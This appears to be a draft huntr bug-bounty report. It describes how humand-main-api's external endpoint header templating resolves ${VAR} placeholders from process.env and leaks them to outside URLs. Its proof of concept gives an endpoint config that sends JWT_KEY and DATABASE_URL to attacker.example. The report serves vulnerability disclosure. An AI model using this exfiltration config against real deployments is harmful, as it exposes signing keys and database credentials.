# humand-main-api — Environment variable exfiltration via external endpoint header templating STATUS: DRAFT program: humand | platform: huntr | repo: HumandDev/humand-main-api | commit: bb975d08cc ```` Repository URL: https://github.com/HumandDev/humand-main-api Package Manager: npm CVSS: Attack Vector: Network Title: humand-main-api — Environment variable exfiltration via external endpoint header templating Description: ## huntr Form Fields ``` Package Manager: npm Version Affected: latest (commit bb975d08cc) Vulnerability Type: Insertion of Sensitive Information Into Sent Data CVSS: Attack Vector: Network Attack Complexity: Low Privileges Required: High User Interaction: None Scope: Changed Confidentiality: High Integrity: Low Availability: Low Title: External endpoint headers resolve ${ENV_VAR} templates and leak process secrets ``` ### Description # Description `externalEndpoints.ts` resolves `${VARNAME}` placeholders in endpoint headers against `process.env` before sending outbound HTTP requests. Observed code path: ```ts headers[header] = currentValue.replace(/\$\{\w+}/gi, (paramWithBraces) => { const param = paramWithBraces.replace('${', '').replace('}', ''); return process.env[param] ?? paramWithBraces; }); ``` If an attacker can create or modify external endpoint configuration (directly or via chained SQLi/admin abuse), they can define headers like `X-Leak: ${JWT_KEY}` and force sensitive runtime secrets to be transmitted to attacker-controlled infrastructure. # Proof of Concept 1. Create/update an external endpoint record with attacker URL and header template. 2. Set a header such as `X-Env-Leak: ${MASTER_PASSWORD}` or `Authorization: Bearer ${JWT_KEY}`. 3. Trigger endpoint invocation through application flow. 4. Inspect attacker server logs and observe resolved secret values. Example endpoint config concept: ```json { "url": "https://attacker.example/collect", "method": "POST", "headers": { "X-Env-Leak": "${JWT_KEY}", "X-DB": "${DATABASE_URL}" } } ``` Expected vulnerable behavior: outbound request contains resolved environment variable values in headers. ### Impact Leaked environment variables can include JWT signing keys, database credentials, AWS credentials, and master password material. This can lead to full account forgery, infrastructure compromise, and lateral movement. ### Occurrences ``` Permalink: https://github.com/HumandDev/humand-main-api/blob/bb975d08cc/src/api/services/externalEndpoints.ts#L57-L66 Description: replaceHeadersWithEnv substitutes ${...} placeholders with process.env values Permalink: https://github.com/HumandDev/humand-main-api/blob/bb975d08cc/src/api/services/externalEndpoints.ts#L72-L78 Description: invokeExternalEndpoint sends resolved headers to configured external URL ``` ### References ``` URL: https://cwe.mitre.org/data/definitions/200.html Name: CWE-200: Exposure of Sensitive Information to an Unauthorized Actor URL: https://owasp.org/Top10/A02_2021-Cryptographic_Failures/ Name: OWASP A02 - Cryptographic Failures (secret handling) URL: https://owasp.org/www-community/attacks/Server_Side_Request_Forgery Name: OWASP SSRF overview (relevant for exfil channels) ``` ````